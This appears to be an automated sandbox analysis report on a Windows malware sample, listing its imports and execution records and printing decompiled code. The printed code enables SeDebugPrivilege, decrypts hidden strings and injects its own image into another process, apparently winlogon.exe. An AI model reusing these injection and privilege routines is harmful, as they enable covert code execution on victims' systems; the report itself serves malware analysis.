      .rdata | 0x13000 | 0x4190 | 0x4200 | False | 0.407788825758 | COM executable for DOS | 5.58195571948 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .data | 0x18000 | 0x146 | 0x200 | False | 0.3046875 | data | 2.0215018045 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

      Imports

      DLLImport
      USER32.dllIsCharAlphaA, BringWindowToTop, CopyAcceleratorTableA, DdeKeepStringHandle, FindWindowExA, InsertMenuW, LookupIconIdFromDirectoryEx, IsWindowEnabled, EnumPropsExW, SetSysColors, GetClassInfoExA, SendMessageTimeoutA, DrawCaption, GetMonitorInfoA, CreatePopupMenu, SetMenuItemInfoA, EnumWindowStationsW, ToUnicode, SubtractRect, ChangeDisplaySettingsA, SetScrollRange, SetDlgItemInt, DestroyMenu, CreateIconFromResourceEx, IsDialogMessage, GetWindowRgn, RealGetWindowClass, CreateDialogIndirectParamA, SetWindowTextW, CallWindowProcW, HideCaret, SetPropW, CharUpperW, LoadBitmapA, SetWindowLongW, GetSystemMetrics, CallNextHookEx, SetForegroundWindow, LoadMenuW, CharToOemBuffA, IsDialogMessageA, TabbedTextOutA, DdeCreateStringHandleA, ValidateRect, EnumDesktopsA, CreateAcceleratorTableW, DialogBoxIndirectParamA, GetUpdateRect, GetMenuItemID, GetWindowInfo, MapVirtualKeyExA, DdeQueryStringW, FrameRect, EnumDisplaySettingsExA, ToUnicodeEx, SendMessageW, IsZoomed, GetScrollRange, SetPropA, IsCharAlphaW, GetWindowModuleFileNameA, WaitForInputIdle, CopyAcceleratorTableW, IsCharUpperA, MonitorFromWindow, GetClassInfoExW, IsRectEmpty, TrackPopupMenuEx, CreateIconIndirect, SetWindowTextA, SetRectEmpty, DlgDirListW, TrackMouseEvent, GetMenuItemInfoA, DrawFrameControl, CloseDesktop, GetWindowThreadProcessId, SetScrollInfo, DrawFrame, GetMessageA, AttachThreadInput, InsertMenuItemW, GetFocus, ChangeDisplaySettingsExA, ScrollWindow, SwitchDesktop, GetClassLongW, MonitorFromRect, SetKeyboardState, TranslateAcceleratorA, PostThreadMessageA, AppendMenuA, DrawIconEx, GetWindowContextHelpId, CharToOemW, ChangeMenuW, DlgDirSelectExW, LoadImageW, MsgWaitForMultipleObjects, UnpackDDElParam, DispatchMessageA, BlockInput, SetMessageExtraInfo, TrackPopupMenu, GetKeyboardLayoutNameA, DragDetect, GetUserObjectSecurity, UnloadKeyboardLayout, IsDialogMessageW, MapVirtualKeyW, RegisterClipboardFormatA, GetMenuStringA, CharNextA, GetKeyState, GetAsyncKeyState, SendMessageTimeoutW, 
DdePostAdvise, DrawTextW, GetCaretBlinkTime, CharPrevW, GetNextDlgTabItem, GetCursorInfo, GetDC, GetThreadDesktop, CloseWindowStation, DdeCreateStringHandleW, GetKeyNameTextW, GetWindowLongA, GetKBCodePage, DdeFreeDataHandle, LoadCursorW, GetWindowTextW, DestroyCursor, RemovePropW, IsCharLowerW, DrawStateA, EnableScrollBar, DdeSetUserHandle, EnumPropsW, GetSysColor, GetActiveWindow, EndPaint, FlashWindowEx
      ADVAPI32.dllRegSetValueA, SetSecurityInfo, LookupPrivilegeNameA, GetAccessPermissionsForObjectA, CreateServiceA, RegQueryMultipleValuesA, CryptSignHashA, CreatePrivateObjectSecurity, AdjustTokenPrivileges, QueryServiceStatus, ReportEventW, LookupAccountNameA, RegSetValueExA, GetOverlappedAccessResults, LookupPrivilegeValueW, CryptEnumProviderTypesA, CreateProcessAsUserA, ConvertSecurityDescriptorToAccessNamedA, RegEnumValueA, SetEntriesInAclW, QueryServiceLockStatusW, ConvertSecurityDescriptorToAccessA, AddAccessDeniedAce, CryptSignHashW, ControlService, RegQueryValueExW, RegDeleteKeyA, PrivilegedServiceAuditAlarmA, ImpersonateLoggedOnUser, RegDeleteValueW, CryptDestroyKey, SetTokenInformation, LookupSecurityDescriptorPartsW, GetServiceKeyNameA, DuplicateTokenEx, ConvertAccessToSecurityDescriptorW, LookupPrivilegeDisplayNameA, BuildTrusteeWithNameA, LookupPrivilegeValueA, RegConnectRegistryA, ReportEventA, AddAce, CryptReleaseContext, EqualSid, StartServiceCtrlDispatcherA, OpenThreadToken, SetServiceStatus, AddAuditAccessAce, CryptHashSessionKey, GetExplicitEntriesFromAclA, BuildImpersonateExplicitAccessWithNameW, NotifyBootConfigStatus, CryptGetDefaultProviderW, GetMultipleTrusteeA, CryptDuplicateHash, EqualPrefixSid, CreateServiceW, GetPrivateObjectSecurity, GetAclInformation, CryptGetDefaultProviderA, MakeSelfRelativeSD, MapGenericMask, GetServiceDisplayNameW, GetMultipleTrusteeW, OpenEventLogW, DestroyPrivateObjectSecurity, DeleteService, GetSecurityInfo, RegOpenKeyW, RegSaveKeyW, SetNamedSecurityInfoA, ObjectCloseAuditAlarmW, RegQueryMultipleValuesW, LogonUserA, AddAccessAllowedAce, CryptGetProvParam, ClearEventLogA, EnumServicesStatusW, SetNamedSecurityInfoW, GetSidLengthRequired, GetSecurityDescriptorOwner, ObjectOpenAuditAlarmW, LockServiceDatabase, GetSidIdentifierAuthority, RegQueryInfoKeyA, GetEffectiveRightsFromAclA, BackupEventLogW, ObjectDeleteAuditAlarmA, OpenBackupEventLogW, GetAccessPermissionsForObjectW, GetEffectiveRightsFromAclW, 
ImpersonateSelf, BuildTrusteeWithNameW, LookupPrivilegeNameW, CryptGetHashParam, RegEnumKeyExA, AbortSystemShutdownA, InitiateSystemShutdownA, RegQueryValueA, OpenSCManagerA, BuildSecurityDescriptorW, ObjectPrivilegeAuditAlarmW, CryptEnumProviderTypesW, CryptSetProviderExW, CryptExportKey, SetEntriesInAccessListA
      SHLWAPI.dllPathIsRelativeA, HashData, SHDeleteKeyW, SHOpenRegStream2W, PathStripPathW, SHRegQueryUSValueW, StrRetToBufA, PathParseIconLocationW, SHSetThreadRef, ColorHLSToRGB, UrlCreateFromPathW, StrCatBuffW, UrlApplySchemeW, SHSkipJunction, UrlUnescapeW, StrRStrIW, PathCompactPathExW, SHAutoComplete, PathMakeSystemFolderA, PathGetCharTypeA, IntlStrEqWorkerA, PathRemoveExtensionA, ColorAdjustLuma, SHRegOpenUSKeyW, SHRegGetBoolUSValueA, PathIsPrefixA, PathRelativePathToW, UrlHashA, SHRegEnumUSValueW, PathMakePrettyA, StrIsIntlEqualA, SHDeleteEmptyKeyW, UrlIsOpaqueA, PathIsSameRootW, SHCopyKeyW, PathFindExtensionW, PathIsDirectoryA, UrlCompareW, PathIsPrefixW, GetMenuPosFromID, StrStrIW, PathAppendA, SHCreateStreamOnFileW, PathAddExtensionW, wnsprintfW, PathRemoveBackslashW, PathUndecorateA, StrCmpW, SHRegQueryInfoUSKeyW, UrlGetLocationW, UrlCompareA, UrlCanonicalizeA, PathFindNextComponentW, SHQueryInfoKeyA, UrlCanonicalizeW, SHRegSetUSValueW, PathFindFileNameW, StrSpnW, PathIsUNCA, SHGetValueW, PathUnmakeSystemFolderA, UrlIsNoHistoryA, PathFindFileNameA, PathIsSystemFolderW, PathAddExtensionA, StrStrA, PathFindSuffixArrayW, StrPBrkA, StrFromTimeIntervalA, SHIsLowMemoryMachine, PathRemoveFileSpecW, SHOpenRegStream2A, PathGetDriveNumberW, PathRemoveBlanksW, StrCmpNW, PathStripPathA, SHRegDeleteEmptyUSKeyW, PathFileExistsW, StrCmpNIW, PathFileExistsA, SHRegGetBoolUSValueW, StrRChrW, StrChrIW, PathIsUNCServerA, PathIsRootA, PathSearchAndQualifyW, PathCreateFromUrlW, StrToIntExA, PathRemoveArgsW, StrCpyNW, StrRetToBufW, PathGetArgsA, SHCreateShellPalette, StrDupA, PathCommonPrefixA, PathIsContentTypeA, PathStripToRootW, PathQuoteSpacesA, IntlStrEqWorkerW, PathCombineA, PathMatchSpecW, SHRegOpenUSKeyA, SHDeleteKeyA, StrFormatByteSize64A, SHStrDupA, StrCSpnIW, PathUnmakeSystemFolderW, wvnsprintfA
      ole32.dllCoRevokeClassObject, OleGetIconOfFile, StgSetTimes, OleRun, CoCreateGuid, MkParseDisplayName, OleLoad, UtConvertDvtd16toDvtd32, CoLockObjectExternal, CoFreeLibrary, WriteStringStream, ReadFmtUserTypeStg, WriteClassStm, GetHGlobalFromILockBytes, OleDestroyMenuDescriptor, IsAccelerator, OleQueryCreateFromData, CoRegisterChannelHook, CoRevertToSelf, CreateILockBytesOnHGlobal, MonikerCommonPrefixWith, StgGetIFillLockBytesOnILockBytes, OleInitialize, OleUninitialize, OleDuplicateData, SetConvertStg, CoGetMalloc, CoFileTimeToDosDateTime, CoUninitialize, CoTreatAsClass, CreatePointerMoniker, UpdateDCOMSettings, OleConvertIStorageToOLESTREAM, CoRegisterMessageFilter, CreateDataAdviseHolder, CoGetPSClsid, OleRegGetMiscStatus, OleQueryLinkFromData, CoCopyProxy, OleGetAutoConvert, OleNoteObjectVisible, IIDFromString, OleCreateStaticFromData, IsEqualGUID, OleSetAutoConvert, ReadClassStg, StgGetIFillLockBytesOnFile, StgOpenStorage, UtConvertDvtd32toDvtd16, CreateBindCtx, CoFreeUnusedLibraries, CoLoadLibrary, StringFromIID, OleGetClipboard, CoGetObject, CoQueryAuthenticationServices, StgCreateDocfileOnILockBytes, SetDocumentBitStg, OleCreateFromFile, WriteOleStg, CoCreateInstance, WriteFmtUserTypeStg, RevokeDragDrop, CoTaskMemFree, GetClassFile, CoRevokeMallocSpy, CoGetCurrentLogicalThreadId, OleDraw, OleGetIconOfClass, OpenOrCreateStream, OleRegEnumVerbs, StgIsStorageILockBytes, OleConvertIStorageToOLESTREAMEx, CoUnmarshalHresult, CoTaskMemAlloc, CoGetInstanceFromFile, CoCreateFreeThreadedMarshaler, EnableHookObject, OleCreateDefaultHandler, OleSave, CoInitialize, OleSetMenuDescriptor, OleCreateLinkEx, OleCreateLink, CoInitializeEx, OleCreateFromFileEx, OleRegGetUserType, CoGetCallerTID, DoDragDrop, CLSIDFromProgID
      KERNEL32.dllFreeLibraryAndExitThread, VerLanguageNameA, IsDebuggerPresent, CreateDirectoryExA, GetDiskFreeSpaceExW, GetModuleHandleW, VirtualProtectEx, GetPrivateProfileIntA, FileTimeToLocalFileTime, FreeConsole, GetFileAttributesExA, lstrcpynA, GetCommMask, OpenMutexW, CreateMailslotW, EnumCalendarInfoW, GetConsoleOutputCP, LCMapStringW, FormatMessageW, GetShortPathNameW, ExitProcess, SetThreadLocale, CopyFileExW, OpenEventW, CreateEventA, WaitForMultipleObjects, EnumResourceTypesA, GetSystemTimeAsFileTime, VirtualProtect, SystemTimeToTzSpecificLocalTime, WaitForDebugEvent, GetDiskFreeSpaceW, GetConsoleScreenBufferInfo, lstrcmpW, ReadConsoleOutputAttribute, GetStartupInfoA, SetEnvironmentVariableA, GlobalMemoryStatus, SetConsoleOutputCP, WriteConsoleOutputW, HeapFree, IsBadHugeWritePtr, FlushViewOfFile, GetSystemInfo, EnumResourceLanguagesA, FillConsoleOutputCharacterW, SetCalendarInfoA, GlobalAlloc, EnumCalendarInfoA, EnumResourceLanguagesW, GetThreadContext, CreateMutexW, VirtualFree, GetWriteWatch, GetCPInfo, lstrlenA, SetVolumeLabelW, VirtualFreeEx, IsSystemResumeAutomatic, GetNamedPipeHandleStateW, GetPrivateProfileSectionA, GetTempFileNameW, GetSystemDirectoryW, CreateFiber, GlobalFindAtomW, lstrcmpA, VirtualAlloc, GetLocalTime, MoveFileExA, GetPrivateProfileStringA, GetPriorityClass, GetCurrentThread, SetupComm, EnumSystemLocalesA, SetThreadPriorityBoost, LoadResource, GetNumberOfConsoleMouseButtons, GetPrivateProfileIntW, GetBinaryTypeA, SetConsoleTitleA, ReleaseMutex, RemoveDirectoryW, HeapValidate, CreateDirectoryExW, IsBadStringPtrW, GetCurrentProcess, GetEnvironmentStringsA, EndUpdateResourceA, SetConsoleCtrlHandler, GetThreadPriorityBoost, FreeEnvironmentStringsW, GetNumberFormatW, CreateProcessW, GetFileInformationByHandle, Heap32Next, CreateFileW, GetUserDefaultLangID, ReadConsoleOutputA, GetCommProperties, GetProcAddress, CancelIo, CompareStringA, LoadLibraryA, GetProfileIntA, SetConsoleScreenBufferSize, TlsSetValue, ReadConsoleOutputW, 
WritePrivateProfileStringW, LoadLibraryExW, FindResourceExW, SetUnhandledExceptionFilter, MapViewOfFileEx, WritePrivateProfileStructA, FatalAppExitA, IsBadStringPtrA, EnumDateFormatsA, BeginUpdateResourceA, FlushInstructionCache, CopyFileA, FoldStringA, ReadConsoleA, lstrcmpiA, CreateDirectoryA, ReadFile, CreateConsoleScreenBuffer, SetProcessWorkingSetSize, WritePrivateProfileSectionW, GlobalLock, WaitCommEvent, CreateTapePartition, SetConsoleCP, SystemTimeToFileTime, SetFilePointer, GetVersion, GetDriveTypeW, PurgeComm, WritePrivateProfileSectionA, CloseHandle, lstrcmpiW, GetDateFormatW

      Network Behavior

      No network behavior found

      Code Manipulations


      System Behavior

      General

      Start time:03:02:52
      Start date:14/03/2021
      Path:C:\Users\user\Desktop\glGb1KYfX6.exe
      Wow64 process (32bit):true
      Commandline:'C:\Users\user\Desktop\glGb1KYfX6.exe'
      Imagebase:0x400000
      File size:89600 bytes
      MD5 hash:8944BC22235936B73BDF874BFA4D1A64
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:low

      General

      Start time:03:02:53
      Start date:14/03/2021
      Path:C:\Windows\System32\winlogon.exe
      Wow64 process (32bit):false
      Commandline:
      Imagebase:0x7ff739090000
      File size:677376 bytes
      MD5 hash:F9017F2DC455AD373DF036F5817A8870
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Disassembly

      Code Analysis


        Executed Functions

        C-Code - Quality: 75%
        			E0040B135(WCHAR* _a4) {
        				long _v8;
        				char _v520;
        				short _v522;
        				short _v524;
        				short _v526;
        				char _v528;
        				short _v1048;
        				long _v1076;
        				void* _v1084;
        				short _v1604;
        				short _v2124;
        				short _v2644;
        				short _v3164;
        				void* _t37;
        				intOrPtr _t38;
        				signed int _t41;
        				struct tagPROCESSENTRY32W* _t47;
        				void* _t53;
        				WCHAR* _t59;
        				void* _t62;
        				long _t68;
        				int _t74;
        				void* _t76;
        				void* _t78;
        				void* _t80;
        
        				_t37 = CreateToolhelp32Snapshot(2, 0); // executed
        				_t76 = _t37;
        				if(_t76 != 0xffffffff) {
        					_v8 = 0x103;
        					if(( *0x414be8 & 0x00000001) == 0) {
        						_t38 =  *0x414ad4; // 0x241f5a8
        						lstrcpyW( &_v1604,  *(_t38 + 0x1c));
        					} else {
        						_t74 = GetUserNameW( &_v1604,  &_v8);
        						if(_t74 == 0) {
        							_v1604 = _t74;
        						}
        					}
        					_t41 =  *0x414be8; // 0x0
        					_v8 = 0;
        					 *0x414b58(0,  &_v3164,  !_t41 & 0x00000001 | 0x00000024, 1, _t78); // executed
        					_t47 =  &_v1084;
        					_v1084 = 0x22c;
        					Process32FirstW(_t76, _t47); // executed
        					while(_t47 != 0) {
        						if(lstrcmpiW( &_v1048, _a4) != 0) {
        							L22:
        							_t47 = Process32NextW(_t76,  &_v1084); // executed
        							continue;
        						}
        						_t80 = OpenProcess(0x410, 0, _v1076);
        						if(_t80 == 0) {
        							goto L22;
        						}
        						_t53 =  *0x414c9c(_t80, 0,  &_v528, 0x104); // executed
        						if(_t53 == 0) {
        							L21:
        							CloseHandle(_t80);
        							goto L22;
        						}
        						PathCombineW( &_v2124,  &_v3164, _a4);
        						if(_v528 != 0x5c || _v526 != 0x3f || _v524 != 0x3f || _v522 != 0x5c) {
        							_push( &_v2124);
        							_t59 =  &_v528;
        						} else {
        							_push( &_v2124);
        							_t59 =  &_v520;
        						}
        						if(lstrcmpiW(_t59, ??) != 0) {
        							goto L21;
        						} else {
        							if(_v8 == 0) {
        								_v8 = _v1076;
        							}
        							_t62 = E0040B77A(_t80,  &_v2644); // executed
        							if(_t62 == 0 || lstrcmpiW( &_v2644,  &_v1604) != 0) {
        								goto L21;
        							} else {
        								CloseHandle(_t80);
        								CloseHandle(_t76);
        								_t68 = _v1076;
        								L25:
        								return _t68;
        							}
        						}
        					}
        					CloseHandle(_t76);
        					_t68 = _v8;
        					goto L25;
        				}
        				return 0;
        			}

        APIs
        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040B145
        • GetUserNameW.ADVAPI32(?,00000103), ref: 0040B174
        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000001,?,?,00000000), ref: 0040B1B8
        • Process32FirstW.KERNEL32(00000000,?), ref: 0040B1D0
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2E6
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2F7
        • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 0040B2FE
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CloseHandle$CreateFirstFolderNamePathProcess32SnapshotSpecialToolhelp32User
        • String ID: ?$?$\$\
        • API String ID: 4249123633-2781376886
        • Opcode ID: 3112863238d48f8d53ae1b6c0c1b7c416a46de5e226e3d2089e336a333d11feb
        • Instruction ID: 06312c5ae7a7404a972f4abaf758566dd12a1a26cfb435c30f23d6f459a3aa86
        • Opcode Fuzzy Hash: 3112863238d48f8d53ae1b6c0c1b7c416a46de5e226e3d2089e336a333d11feb
        • Instruction Fuzzy Hash: A9512075900218EADF219BA0DD4CEDE77BCFB44355F1081FAE605E6190D7749A848B9C
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 91%
        			E0040AC42() {
        				signed int _v5;
        				long _v12;
        				short _v532;
        				void* __ebx;
        				void* _t34;
        				void* _t36;
        				void* _t38;
        				char _t42;
        				void* _t45;
        				long _t46;
        				void* _t48;
        				void* _t50;
        				int _t53;
        				char* _t57;
        				void* _t58;
        				intOrPtr _t63;
        				void* _t65;
        				signed int _t66;
        				signed int _t71;
        				void* _t73;
        				void* _t75;
        				intOrPtr _t76;
        				signed int _t80;
        				char* _t84;
        				void* _t86;
        				signed char* _t90;
        				void* _t91;
        
        				 *0x414be8 =  *0x414be8 & 0x00000000;
        				_t34 = E0040A1BF();
        				if(_t34 != 0) {
        					 *0x414ad0 =  *0x414ad0 | 0xffffffff;
        					 *0x414ca0 = E0040B0D6(E0040AB9A); // executed
        					_t36 = HeapCreate(0, 0x80000, 0); // executed
        					 *0x415fa8 = _t36;
        					if(_t36 != 0) {
        						 *0x4147a3 = 1;
        					} else {
        						 *0x415fa8 = GetProcessHeap();
        						 *0x4147a3 = 0;
        					}
        					E00412BFD();
        					 *0x4155b0 = 0;
        					 *0x4147ca = 0;
        					_t38 = RtlAllocateHeap( *0x415fa8, 8, 0x1a0);
        					 *0x414ad4 = _t38;
        					if(_t38 != 0) {
        						_v12 = 0;
        						while(1) {
        							_t71 = (_v12 & 0x0000ffff) << 2;
        							_t41 = ( *( *(_t71 + 0x414020)) & 0x000000ff) + 1;
        							if(( *( *(_t71 + 0x414020)) & 0x000000ff) + 1 == 0) {
        								break;
        							}
        							_t84 = E0040F14B(_t41);
        							if(_t84 == 0) {
        								break;
        							} else {
        								_t90 =  *(_t71 + 0x414020);
        								_v5 = 0;
        								if( *_t90 > 0) {
        									_t66 = 0;
        									_t73 = 0xba;
        									do {
        										_v5 = _v5 + 1;
        										 *((char*)(_t66 + _t84)) = ( &(_t90[1]))[_t66] + _t73;
        										_t66 = _v5 & 0x000000ff;
        										_t73 = _t73 + 2;
        									} while (_t66 <  *_t90);
        								}
        								 *((char*)((_v5 & 0x000000ff) + _t84)) = 0;
        								if( *_t84 != 0x57) {
        									_t45 =  *0x414ad4; // 0x241f5a8
        									 *((intOrPtr*)(_t45 + _t71)) = _t84 + 1;
        									goto L17;
        								} else {
        									_t15 = _t84 + 1; // 0x1
        									_t63 = E0040F5EA(( *( *(_t71 + 0x414020)) & 0x000000ff) - 1, _t15);
        									_t75 =  *0x414ad4; // 0x241f5a8
        									 *((intOrPtr*)(_t75 + _t71)) = _t63;
        									E0040F15E(_t84);
        									_t65 =  *0x414ad4; // 0x241f5a8
        									if( *((intOrPtr*)(_t65 + _t71)) != 0) {
        										L17:
        										_v12 = _v12 + 1;
        										if(_v12 < 0x67) {
        											continue;
        										} else {
        											_t46 = GetCurrentProcessId();
        											_t76 =  *0x414ca0; // 0x400000
        											 *0x414c94 = _t46;
        											_t22 = _t76 + 0x3c; // 0xe0
        											_t48 =  *_t22 + _t76;
        											_t80 =  *(_t48 + 6) & 0x0000ffff;
        											_t91 = 0;
        											if(_t80 > 0) {
        												_t86 = 3;
        												if(_t86 < _t80) {
        													_t58 = ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x90;
        													_t91 =  *((intOrPtr*)(_t58 + 0xc)) + _t76;
        													if(IsBadHugeReadPtr(_t91,  *(_t58 + 8)) != 0) {
        														_t91 = 0;
        													}
        												}
        											}
        											 *0x414b7c = _t91;
        											 *0x414b64 =  *0x414d98(); // executed
        											_t50 = E00411622(L"SeDebugPrivilege"); // executed
        											if(_t50 == 0) {
        												 *0x414be8 =  *0x414be8 | 0x00000001;
        											}
        											_v12 = 0x103;
        											_t53 = GetUserNameW( &_v532,  &_v12); // executed
        											if(_t53 == 0) {
        												L26:
        												 *0x414a3c = "-";
        											} else {
        												_t57 = E0040F1B1( &_v532, _v12 + _v12);
        												 *0x414a3c = _t57;
        												if(_t57 == 0) {
        													goto L26;
        												}
        											}
        											_t42 = 1;
        										}
        									} else {
        										break;
        									}
        								}
        							}
        							L28:
        							goto L29;
        						}
        						_t42 = 0;
        						goto L28;
        					} else {
        						_t42 = 0;
        					}
        					L29:
        					return _t42;
        				} else {
        					return _t34;
        				}
        			}

        APIs
        • HeapCreate.KERNELBASE(00000000,00080000,00000000), ref: 0040AC7E
        • GetProcessHeap.KERNEL32 ref: 0040AC8D
        • RtlAllocateHeap.NTDLL(00000008,000001A0), ref: 0040ACC7
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Heap$AllocateCreateProcess
        • String ID: SeDebugPrivilege$g
        • API String ID: 3901675031-1766330171
        • Opcode ID: 1ea32012190142d9c9aec1bc1d11b432d95ab3d49db9e3454c3f05bc7872b82b
        • Instruction ID: 2f586e3992df8223b26a3399dcbcab5864722124d850cf92ae4e9f0cf7b24fab
        • Opcode Fuzzy Hash: 1ea32012190142d9c9aec1bc1d11b432d95ab3d49db9e3454c3f05bc7872b82b
        • Instruction Fuzzy Hash: 5F5122305083119FDB218F65E8847EA7FB5EF81309F0480BAE445E72E2D7B88951CB6E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00407665(void* _a4) {
        				void* _v8;
        				signed int _v12;
        				long _v16;
        				intOrPtr _v20;
        				void* _v24;
        				void* _t61;
        				intOrPtr _t64;
        				intOrPtr _t66;
        				void* _t67;
        				void* _t77;
        				long _t81;
        				intOrPtr* _t84;
        				void* _t85;
        				void* _t86;
        				void* _t87;
        				void* _t91;
        				intOrPtr _t93;
        				unsigned int _t95;
        				signed int _t97;
        				void* _t103;
        				long _t105;
        				void* _t106;
        				long* _t107;
        				void* _t109;
        				void* _t111;
        
        				_t86 =  *0x414ca0; // 0x400000
        				_t1 = _t86 + 0x3c; // 0xe0
        				_t111 =  *_t1 + _t86;
        				_v24 = _t86;
        				_t61 = VirtualAllocEx(_a4,  *(_t111 + 0x34),  *(_t111 + 0x50), 0x2000, 1); // executed
        				_v8 = _t61;
        				if(_t61 != 0) {
        					L3:
        					_t62 =  *(_t111 + 0x50);
        					if( *(_t111 + 0x50) == 0) {
        						L2:
        						return 0;
        					}
        					_t64 = E0040F14B(_t62);
        					_v20 = _t64;
        					if(_t64 == 0) {
        						goto L2;
        					}
        					E0040F19A(_t64, _t86,  *(_t111 + 0x50));
        					_t66 =  *((intOrPtr*)(_t111 + 0xa0));
        					if(_t66 == 0 ||  *((intOrPtr*)(_t111 + 0xa4)) == 0) {
        						L16:
        						_t105 =  *(_t111 + 0x54);
        						_t67 = VirtualAllocEx(_a4, _v8, _t105, 0x1000, 4); // executed
        						if(_t67 == 0) {
        							goto L2;
        						}
        						WriteProcessMemory(_a4, _v8, _t86, _t105, 0); // executed
        						VirtualProtectEx(_a4, _v8, _t105, 2,  &_v16); // executed
        						_v12 = _v12 & 0x00000000;
        						_t106 = ( *(_t111 + 0x14) & 0x0000ffff) + _t111 + 0x18;
        						if(0 >=  *(_t111 + 6)) {
        							L21:
        							E0040F15E(_v20);
        							return _v8;
        						}
        						_t107 = _t106 + 8;
        						while(1) {
        							_t77 = VirtualAllocEx(_a4, _v8 + _t107[1],  *_t107, 0x1000, 4); // executed
        							_t87 = _t77;
        							if(_t87 == 0) {
        								goto L2;
        							}
        							WriteProcessMemory(_a4, _t87, _t107[1] + _v20,  *_t107, 0); // executed
        							_t81 = 0x40;
        							_v16 = _t81;
        							VirtualProtectEx(_a4, _t87,  *_t107, _t81,  &_v16); // executed
        							_t107 =  &(_t107[0xa]);
        							_v12 = _v12 + 1;
        							if(_v12 < ( *(_t111 + 6) & 0x0000ffff)) {
        								continue;
        							}
        							goto L21;
        						}
        						goto L2;
        					} else {
        						_t91 =  *(_t111 + 0x34);
        						_t103 = _v8 - _t91;
        						_t109 = _t86 - _t91;
        						_t84 = _t66 + _v20;
        						while( *_t84 != 0) {
        							_t93 =  *((intOrPtr*)(_t84 + 4));
        							if(_t93 < 8) {
        								L14:
        								_t84 = _t84 +  *((intOrPtr*)(_t84 + 4));
        								continue;
        							}
        							_t95 = _t93 + 0xfffffff8 >> 1;
        							_v16 = _t95;
        							_v12 = 0;
        							if(_t95 == 0) {
        								goto L14;
        							} else {
        								goto L10;
        							}
        							do {
        								L10:
        								_t97 =  *(_t84 + 8 + _v12 * 2) & 0x0000ffff;
        								if(_t97 != 0) {
        									 *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) =  *((intOrPtr*)((_t97 & 0x00000fff) +  *_t84 + _v20)) + _t103 - _t109;
        								}
        								_v12 = _v12 + 1;
        							} while (_v12 < _v16);
        							_t86 = _v24;
        							goto L14;
        						}
        						goto L16;
        					}
        				}
        				_t85 = VirtualAllocEx(_a4, _t61,  *(_t111 + 0x50), 0x2000, 1); // executed
        				_v8 = _t85;
        				if(_t85 != 0) {
        					goto L3;
        				}
        				goto L2;
        			}

        APIs
        • VirtualAllocEx.KERNELBASE(?,?,?,00002000,00000001,00000000,00000000,00000000,?,?,?), ref: 0040768D
        • VirtualAllocEx.KERNELBASE(?,00000000,?,00002000,00000001,?,?), ref: 004076A4
        • VirtualAllocEx.KERNELBASE(?,?,?,00001000,00000004,00000000,00400000,?,?,?), ref: 00407759
        • WriteProcessMemory.KERNELBASE(?,?,00400000,?,00000000,?,?), ref: 00407771
        • VirtualProtectEx.KERNELBASE(?,?,?,00000002,?,?,?), ref: 00407784
        • VirtualAllocEx.KERNELBASE(00000000,?,?,00001000,00000004,?,?), ref: 004077B4
        • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,00000000,?,?), ref: 004077D3
        • VirtualProtectEx.KERNELBASE(00000000,00000000,?,00000040,?,?,?), ref: 004077EA
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Virtual$Alloc$MemoryProcessProtectWrite
        • String ID:
        • API String ID: 426431698-0
        • Opcode ID: 16435dd42bd012d6eb4fd5703808211e61ec03075562024a3e2316b0ddaa140e
        • Instruction ID: 518997f5d736486df1ae1b5f13570019489d1ee803f4ecb01e32556bf148844c
        • Opcode Fuzzy Hash: 16435dd42bd012d6eb4fd5703808211e61ec03075562024a3e2316b0ddaa140e
        • Instruction Fuzzy Hash: 68517B71A00209EFDF118F94CD84BAEBBB9FF44354F148439E902A72A0D775AD50DB58
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E00411622(WCHAR* _a4) {
        				void* _v8;
        				intOrPtr _v12;
        				struct _TOKEN_PRIVILEGES _v24;
        				void* _t9;
        				int _t13;
        				int _t16;
        				long _t19;
        
        				_t9 =  *0x414ad0; // 0xffffffff
        				_t19 = 0;
        				if(OpenProcessToken(_t9, 0x28,  &_v8) != 0) {
        					_v24.PrivilegeCount = 1;
        					_v12 = 2;
        					_t13 = LookupPrivilegeValueW(0, _a4,  &(_v24.Privileges)); // executed
        					if(_t13 != 0) {
        						_t16 = AdjustTokenPrivileges(_v8, 0,  &_v24, 0x10, 0, 0); // executed
        						if(_t16 != 0 && GetLastError() == 0) {
        							_t19 = 1;
        						}
        					}
        					FindCloseChangeNotification(_v8); // executed
        				}
        				return _t19;
        			}

        APIs
        • OpenProcessToken.ADVAPI32(FFFFFFFF,00000028,?,?,0040ADE9,SeDebugPrivilege), ref: 00411637
        • LookupPrivilegeValueW.ADVAPI32(00000000), ref: 00411657
        • AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000010,00000000,00000000), ref: 0041166D
        • GetLastError.KERNEL32 ref: 00411677
        • FindCloseChangeNotification.KERNELBASE(?), ref: 00411686
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Token$AdjustChangeCloseErrorFindLastLookupNotificationOpenPrivilegePrivilegesProcessValue
        • String ID:
        • API String ID: 1669889876-0
        • Opcode ID: 0ff21e494fb825d6b069af88e8dedd6feb6e731155c79301bf749cd92992fbac
